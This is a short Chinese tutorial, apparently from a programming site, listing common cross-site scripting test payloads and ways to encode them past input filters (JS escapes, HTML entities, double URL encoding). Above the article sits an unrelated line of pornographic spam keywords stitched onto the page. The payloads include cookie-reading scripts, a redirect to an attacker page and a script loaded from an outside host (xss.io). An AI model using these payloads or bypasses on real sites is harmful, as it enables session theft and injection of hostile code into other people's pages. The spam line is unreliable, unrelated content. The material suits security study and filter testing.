欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

Web網(wǎng)絡(luò)安全漏洞分析XSS常用語(yǔ)句及編碼繞過(guò)詳解

 更新時(shí)間:2021年11月03日 10:48:57   作者:Phanton03167  
這篇文章主要為大家介紹了Web網(wǎng)絡(luò)安全漏洞分析XSS常用語(yǔ)句及編碼繞過(guò)詳解,有需要的朋友可以借鑒參考下希望能夠有所幫助,祝大家多多進(jìn)步早日升職加薪

XSS進(jìn)階

XSS常用語(yǔ)句及編碼繞過(guò)

XSS常用的測(cè)試語(yǔ)句

<img src=1 alert(1)> (顯示1)

<script>alert("xss")</script> (顯示xss)

<script>alert(document.cookie)</script> (顯示cookie)

<script>window.location="(你的黑頁(yè)地址)";</script>

<img src="javascript:alert('XSS')">

<script>alert(document.cookie)</script>

<script>alert(document.cookie)</script>

"+alert('XSS')+"

<script src="http://xss.io/a.js"></script>

<div onclick="alert('xss')">

<div onmouseenter="alert('xss')">

"onclick="alert(document.cookie)

常見(jiàn)的XSS的繞過(guò)編碼有JS編碼、HTML實(shí)體編碼和URL編碼。

JS編碼

JS提供了四種字符編碼的策略,如下所示。

三個(gè)八進(jìn)制數(shù)字,如果個(gè)數(shù)不夠,在前面補(bǔ)0,例如“e”的編碼為“\145”。

兩個(gè)十六進(jìn)制數(shù)字,如果個(gè)數(shù)不夠,在前面補(bǔ)0,例如“e”的編碼為“\x65”。

四個(gè)十六進(jìn)制數(shù)字,如果個(gè)數(shù)不夠,在前面補(bǔ)0,例如“e”的編碼為“\u0065”。

對(duì)于一些控制字符,使用特殊的C類型的轉(zhuǎn)移風(fēng)格(例如\n和\r)。

HTML實(shí)體編碼

命名實(shí)體:以&開(kāi)頭,以分號(hào)結(jié)尾的,例如“<”的編碼是“&lt;”。

字符編碼:十進(jìn)制、十六進(jìn)制ASCII碼或Unicode字符編碼,樣式為“&#數(shù)值;”,例如“<”可以編碼為“&#060;”和“&#x3c;”。

URL編碼

這里的URL編碼,也是兩次URL全編碼的結(jié)果。如果alert被過(guò)濾,結(jié)果為%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34。

在使用XXS編碼測(cè)試時(shí),需要考慮HTML渲染的順序,特別是針對(duì)多種編碼組合時(shí),要選擇合適的編碼方式進(jìn)行測(cè)試。

以上就是Web網(wǎng)絡(luò)安全漏洞分析XSS常用語(yǔ)句及編碼繞過(guò)詳解的內(nèi)容,更多關(guān)于Web網(wǎng)絡(luò)安全漏洞的資料請(qǐng)關(guān)注腳本之家其它相關(guān)文章!

相關(guān)文章

最新評(píng)論